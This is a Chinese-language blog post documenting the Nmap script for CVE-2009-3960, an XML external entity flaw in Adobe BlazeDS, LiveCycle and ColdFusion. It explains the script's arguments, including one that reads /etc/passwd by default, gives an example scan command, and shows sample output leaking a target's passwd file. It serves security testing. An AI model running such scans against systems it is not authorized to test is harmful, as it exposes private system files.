top of page
作家相片Samuel

Nmap NSE Category vulns Script:http-vuln-cve2009-3960 Adobe XML 外部實體注入漏洞 (CVE-2009-3960)

已更新:8月26日


Nmap Script指令摘要


cve-2009-3960 漏洞利用,又稱為 Adobe XML 外部實體注入,此漏洞允許遠端讀取本地檔案,並存在於 BlazeDS 3.2 及更早版本、LiveCycle 8.0.1、8.2.1 和 9.0、LiveCycle Data Services 2.5.1、2.6.1 和 3.0、Flex Data Services 2.0.1 以及 ColdFusion 7.0.2、8.0、8.0.1 和 9.0 中。


這個漏洞允許攻擊者在不需要身份驗證的情況下遠端讀取本地檔案,進而洩露敏感訊息;受影響的產品包括 Adobe 的多個產品和版本,因此需要儘快修補漏洞以確保系統的安全性。


參考資源:

同時還有其他與此漏洞相關的 Nmap 指令,包括:


Nmap Script指令參數

http-vuln-cve2009-3960.root

是指向根路徑的參數,預設值為 "/",這個參數通常用於指定掃描或攻擊的起始位置,即網站的根目錄;在進行漏洞掃描或測試時,您可以根據需要更改此參數,以指定不同的起始路徑。

http-vuln-cve2009-3960.readfile

是指定要讀取的目標檔案的參數,預設值為 "/etc/passwd";這個參數通常用於指定攻擊或測試中要讀取的目標檔案;在漏洞測試中,攻擊者可以指定不同的檔案路徑,以查看目標系統中的檔案內容;請注意,合法的使用是進行安全測試,未經授權的檔案讀取是不道德和非法的。

slaxml.debug

用於開啟或關閉 slaxml 函式庫的偵錯模式;當偵錯模式啟用時,slaxml 函式庫會生成額外的偵錯訊息,以幫助開發人員針對 XML 處理代碼進行除錯,這些訊息包括 XML 解析過程中的詳細資訊,例如元素和屬性的處理,及錯誤訊息,使之更容易追蹤和修復問題;偵錯模式通常在開發和測試階段使用,以協助識別和解決 XML 處理中的問題,在實際運作環境中,通常會禁用偵錯模式,以提高效能並減少不必要的訊息輸出。

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

這些參數用於控制 Nmap 的 HTTP 相關功能,允許您自定義和設定您的 HTTP 請求以適應特定的環境和需求;詳細的資訊和用法可以在 http 函式庫中找到。

  • http.host:設定要存取的主機名稱或 IP 位址。

  • http.max-body-size:設定 HTTP 主體的最大大小。

  • http.max-cache-size:設定 HTTP 快取的最大大小。

  • http.max-pipeline:設定最大支援的 HTTP 管道請求數。

  • http.pipeline:啟用或禁用 HTTP 管道請求。

  • http.truncated-ok:允許截斷的 OK 標誌。

  • http.useragent:指定 HTTP 請求的 User-Agent 表頭,是一個包含文字字串的部分,包括其名稱、版本、操作系統和其他相關訊息,以模擬特定使用者代理的存取。

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

這些參數允許您設定 Nmap 的 SMB 相關功能,以便對 SMB 設備進行身份驗證和存取;具體的用法和詳細資訊可以在smbauth 函式庫中找到。

  • smbdomain:SMB 網域名稱,用於指定 SMB 設備所屬的網域。

  • smbhash:SMB 哈希 (Hash),用於指定 SMB 設備的哈希密碼。

  • smbnoguest:不使用 SMB 的 "guest" 帳號;當啟用時,不使用 SMB 客戶端的 "guest" 帳號進行身份驗證。

  • smbpassword:SMB 密碼,用於指定 SMB 設備的密碼。

  • smbtype:SMB 類型,用於指定 SMB 設備的類型。

  • smbusername:SMB 使用者名稱,用於指定 SMB 設備的使用者名稱。

vulns.short, vulns.showall

這些參數可用於自定義漏洞掃描報告的輸出形式和內容;更多具體的使用方式和詳細資訊可以在 Nmap vulns 函式庫中找到。

  • vulns.short:這個參數用於控制漏洞掃描的輸出格式,可能的值包括 "true"(簡短模式)和 "false"(非簡短模式);當設置為 "true" 時,漏洞報告以較簡潔的方式呈現,通常用於簡要的漏洞報告摘要。

  • vulns.showall:這個參數用於控制是否顯示所有漏洞訊息;參數值包括 "true"(顯示所有訊息)和 "false"(只顯示重要訊息);當設定為 "true" 時,漏洞報告將包括所有相關的詳細資訊,而當設置為 "false" 時,則僅包括關鍵訊息。


Nmap Script指令範例

nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>

Nmap Script指令輸出

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_

Nmap Script作者

Hani Benhabiles

License: Same as Nmap--See https://nmap.org/book/man-legal.html



Nmap
Nmap

 

延伸閱讀

12 次查看

Comments


bottom of page